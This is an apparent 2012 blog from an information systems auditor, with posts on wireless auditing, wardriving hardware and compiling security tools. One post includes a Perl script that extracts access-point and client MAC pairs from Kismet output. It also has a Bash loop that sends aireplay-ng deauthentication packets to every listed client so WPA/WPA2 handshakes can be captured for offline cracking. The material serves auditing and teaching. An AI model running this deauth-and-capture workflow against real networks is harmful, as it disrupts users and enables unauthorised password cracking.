Information Systems Auditing

WRT54GL is Not Dead

admin — Mon, 23 Apr 2012 16:27:01 +0000

Well the WRT54GL is not dead for me. Due to it’s popularity this venerable wireless router has been documented across the Internet on how to software and hardware hack it. Tinkering with this devices is a great way to learn about embedded Linux, cross-compilation, soldering, and serial communication. I continue to search for new ways to play with this router (I plan on adding some USB ports once my 12v/5v power supply arrives!). The reason I’m documenting my experiences is because I haven’t seen many tutorials where the device has a GPS module. I’ve seen some documentation on connecting a GPS device (Garmin) to a serial port. Mine goes the extra step and includes a module in the router for a nice compact wardriving box. I’m even able to set the date and time on the device after a GPS lock is obtained. So I’m going to put together a tutorial on the GPS module and the version of Openwrt, Kismet, and GPSd I used to allow this device to be a self contained wardriving box.

Compiling Wireless Tools for Nokia N810

admin — Mon, 23 Apr 2012 00:51:11 +0000

This tutorial will help you configure the Scratchbox environment to compile the latest svn of aircrack-ng, latest stable kismet, and reaver 1.4 for the Nokia n810. A lot of love is getting sent to the N900 but the n8x0 series of devices are still great for wireless testing. With this tutorial you will be able to compile the software and create Debian packages for easy installation on your Nokia device. Of important note were the errors I encountered while compiling aircrack-ng. The error had not been documented on the Internet. Trust me I Googled my heart out. Everyones solution was update the linux kernel headers. Well in this case that wasn’t possible. I’m not a Linux programmer but I figured out how to edit the header file to make the changed needed to get Aircrack-ng to compile.

Parse Kismet NETXML for Aireplay-ng

admin — Thu, 05 Apr 2012 18:49:33 +0000

This post deals with gathering the information you need to use aircrack-ng to capture a WPA/WPA2 handshake for offline bruteforce attacks. When running aireplay-ng to send out de-authentication packets you need the MAC address of the Access Point and a Client that is associated with it. The way I would collect the information is run Kismet. With the older version of Kismet I would monitor the client (panel view) and select (copy/paste) the access point and client MAC. With the new version of Kismet you cannot select a MAC address. So I wrote myself a quick Perl script to parse the Kismet NETXML file to create output with the MAC addresses of AP and associated client pairs.


#!/usr/bin/perl
use XML::Simple;

$xs = XML::Simple->new( KeyAttr=>[] );
$data = $xs->XMLin($ARGV[0]);

for $wn (@{$data->{'wireless-network'}}){
  $channel = $wn->{'channel'};
  $bssid = $wn->{'BSSID'};
  
  if(ref($wn->{'SSID'}->{'encryption'}) eq 'ARRAY' && $wn->{'type'} eq 'infrastructure')
  {
    if(ref($wn->{'wireless-client'}) eq 'ARRAY'){
      for $wc (@{$wn->{'wireless-client'}}){
        if($wc->{'type'} eq 'tods'){
          print $bssid . " " . $wc->{'client-mac'} . "\n"
        }
      }  
    }
  }
}

I then use the file that was created in a simple Bash script to use aireplay-ng to knock all the clients offline. Of course you have airodump-ng listening for the WPA/WPA2 handshakes.


#!/bin/bash
set -x
AIREPLAY=/usr/local/sbin/aireplay-ng
WIFACE=$1
FILE=$2

while read bssid clientmac
do
    echo $x
    $AIREPLAY -0 1 -a $bssid -c $clientmac --ignore-negative-one $WIFACE
done < $FILE

Compiling Nmap for Android

admin — Wed, 29 Feb 2012 13:34:36 +0000

Compile Nmap for Android

This tutorial will show you how to compile the latest version of Nmap for your Android device starting with a standard Ubuntu install. I will offer instructions on how to obtain two versions of compiler that I’ve had success compiling software for Android. I will show the Android NDK and the free Lite ARM compiler from Mentor (formally Code Sorcery). Hopefully you can take this instruction to try and compile other tools for Android.

The build environment and instructions come from an auditor with strong technical skills but somebody who is not a programmer or developer so hopefully my view point can help other individuals who are also not developers. I’ve built cross-compile environments for Openwrt, Nokia Maemo, Familiar Linux (iPaq) in the past but always from piecing together instructions from multiple Google queues and forum searches. I’m creating this document so it will be helpful for someone somebody elses Google search.

After the Ubuntu installation here are ALL the steps you can/should take to compile Nmap for Android. I like vim as my command-line editor. You can use which ever editor you prefer.

Here is a quick rundown of what is done. Everything (almost) is done from a terminal window.

I update all Ubuntu software and install all files and tools to compile software on Ubuntu
I download the software required to compile for Android
Setup the environment to compile for Android
I create a source folder in the home directory for downloading and compiling the software.
Download the software, patch, configure, and compile.
Install Android SDK Platform Tools to copy files to your phone
Copy files to the phone and set PATH environment variable.

(read more)
(download PDF)

Linux Penetration Testing Laptop Setup v4 (Ubuntu 11.4 Natty Narwhal)

admin — Tue, 20 Sep 2011 03:46:30 +0000

I’m now providing an updated Linux Penetration Testing Laptop Setup document to help install popular and useful vulnerability assessment tools for the Linux operating system. You can go and obtain Backtrack but I feel that you will have more understanding of the tools and Linux in general if you install the tools yourself. You will also have the most current version available. See Configuration Tutorials for the latest document.

Nokia N810 – Wireless Auditing

admin — Thu, 08 Sep 2011 12:52:14 +0000

I created a tutorial on how to setup and configure the Nokia N810 Internet Tablet to conduct a wireless assessment or audit. The tools included in the tutorial include how to setup kismet (oldcore and newcore), aircrack-ng (airbase and aircrack), and btscanner. I’m still working on developing steps to install Metasploit and Karmetasploit for wireless client attacks. The tutorial also details using the internal GPS as well as adding an external wireless adapter. The latest version of the tutorial can be found here.

ISACA Atlanta Chapter – GEEK WEEK 2011

admin — Wed, 24 Aug 2011 01:42:44 +0000

The 4th annual Atlanta Chapter of ISACA GEEK WEEK conference was held the week of August 22nd – 26th. GEEK WEEK is a track-oriented, full week Conference focusing on providing training, networking, and roundtable sessions on IT governance, audit & security.

I conducted the presentation Wireless Auditing on a Budget: Using Low Cost Hardware and Open Source Software. You can find the presentation slides here. For links and information on the other presentations you can go here.

SNMP Assessment Worksheet

admin — Tue, 07 Jun 2011 23:50:35 +0000

I put together another Technical Assessment Plan for assessing the SNMP protocol. You will use open source and freely download-able utilities to assess the SNMP protocol. This is for auditors that do not have access to or cannot afford the Solarwinds toolset. This is version 0.1 of the document and I plan on making updates and add new tools in the future.

LAMP setup for .nessus v2 custom report generation.

admin — Mon, 02 May 2011 18:15:56 +0000

I created Project RF to have a reporting framework that provides consistent reports for various vulnerability scanning tools. The project started with support for Nessus back when I would parse nbe files. I’ve since included reporting for eEye Retina, Nmap, HP WebInpect, AppScan AppDetective, Kismet, and GFI Languard. This project is still in its alpha stages as I’m not a top notch web program developer. Scan results are exported to XML which is then uploaded, parsed, and imported into a backend MySQL database. I have found this framework very useful in generating reports for my workpapers. I still continue to work on this project even though I’m no longer an auditor. Recently I stripped it down to just Nessus and I rewrote the Nessus portion to support the .nesses v2 xml output. Installation and setup instructions can be found here.

This framework supports many options for report generation and executive reporting.

Kennesaw – ISA 4220 Students

admin — Wed, 30 Mar 2011 14:17:21 +0000

Students from ISA 4220 Server Systems Security can download the PowerPoint presentation from here.